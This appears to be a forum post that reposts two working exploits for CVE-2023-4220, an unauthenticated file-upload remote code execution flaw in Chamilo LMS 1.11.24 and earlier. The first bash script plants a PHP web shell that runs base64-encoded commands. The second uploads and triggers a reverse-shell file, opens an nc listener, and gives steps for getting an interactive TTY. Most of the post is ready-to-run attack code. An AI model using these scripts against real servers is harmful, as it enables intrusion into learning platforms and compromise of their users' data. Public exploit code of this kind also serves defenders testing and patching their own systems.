Web File upload (RCE), Chamilo LMS, CVE-2023-4220

[blackhunt]

Chamilo LMS <= 1.11.24 (Beersel 31/08/2023)
Unauthenticated Big Upload File Remote Code Execution

Identify version : /documentation/changelog.html

POC EXPLOIT CVE RCE VULN

#!/bin/bash
URL='http://lms.domain.com'
CMD='id'

PATH_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
PATH_FILE='main/inc/lib/javascript/bigupload/files/rce.php'

cat <<'EOF'>/tmp/rce.php
<?php
$a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a);
?>
EOF

curl -F 'bigUploadFile=@/tmp/rce.php' "$URL/$PATH_UPLD"
CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")
curl "$URL/$PATH_FILE?aoOoy=$CMD"

Source : https://github.com/charlesgargasson/CVE-2023-4220

 

[blackhunt]

Chamilo-LMS-CVE-2023-4220 NEW Exploit .​

This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this location /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24, and Attackers can obtain remote code execution via uploading of web shell. Then it will allows arbitrary files to be uploaded to /main/inc/lib/javascript/bigupload/files directory.

Vulnerability POC​

-You Can at first run the exploit to know how to use it like that:

chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh

-Then you need to enter the requeierd inputs like that:

~$ ./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file

-Here we can found the uploaded file in the server

http://target.test/main/inc/lib/javascript/bigupload/files/

# Exploit Title : Chamilo LMS CVE-2023-4220 Exploit
# Date : 11/28/2023
# Exploit Author : Ziad Sakr (@Ziad-Sakr)
# Version : ≤v1.11.24
# CVE : 2023-4220
# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2023-4220
#
# Description :
#   This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this
#   location "/main/inc/lib/javascript/bigupload/inc/bigUpload.php" in Chamilo LMS <= v1.11.24, and Attackers can
#   obtain remote code execution via uploading of web shell.
#
# Usage:  ./CVE-2023-4220.sh -f reveres_file -h host_link -p port_in_the_reverse_file


#!/bin/bash

# Initialize variables with default values
reverse_file=""
host_link=""
port=""

#------------------------------------------------

RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'


# Usage function to display script usage
usage() {
    echo -e "${GREEN}"
    echo "Usage: $0 -f reverse_file -h host_link -p port_in_the_reverse_file"
    echo -e "${NC}"
    echo "Options:"
    echo "  -f    Path to the reverse file"
    echo "  -h    Host link where the file will be uploaded"
    echo "  -p    Port for the reverse shell"
    exit 1
}

# Parse command-line options
while getopts "f:h:p:" opt; do
    case $opt in
        f)
            reverse_file=$OPTARG
            ;;
        h)
            host_link=$OPTARG
            ;;
        p)
            port=$OPTARG
            ;;
        \?)
            echo -e "${RED}"
            echo "Invalid option: -$OPTARG" >&2
            usage
            ;;
        :)
        echo -e "${RED}"
            echo "Option -$OPTARG requires an argument." >&2
            usage
            ;;
    esac
done

# Check if all required options are provided
if [ -z "$reverse_file" ] || [ -z "$host_link" ] || [ -z "$port" ]; then
    echo -e  "${RED}"
    echo "All options -f, -h, and -p are required."
    usage
fi
# Perform the file upload using curl
echo -e "${GREEN}"
curl -F "bigUploadFile=@$reverse_file" "$host_link/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
echo
echo
echo -e "#    Use This leter For Interactive TTY ;) " "${RED}"
echo "#    python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"
echo "#    export TERM=xterm"
echo "#    CTRL + Z"
echo "#    stty raw -echo; fg"
echo -e "${GREEN}"
echo "# Starting Reverse Shell On Port $port . . . . . . ."
sleep 3
curl "$host_link/main/inc/lib/javascript/bigupload/files/$reverse_file" &
echo -e  "${NC}"

nc -lnvp $port

Source : https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit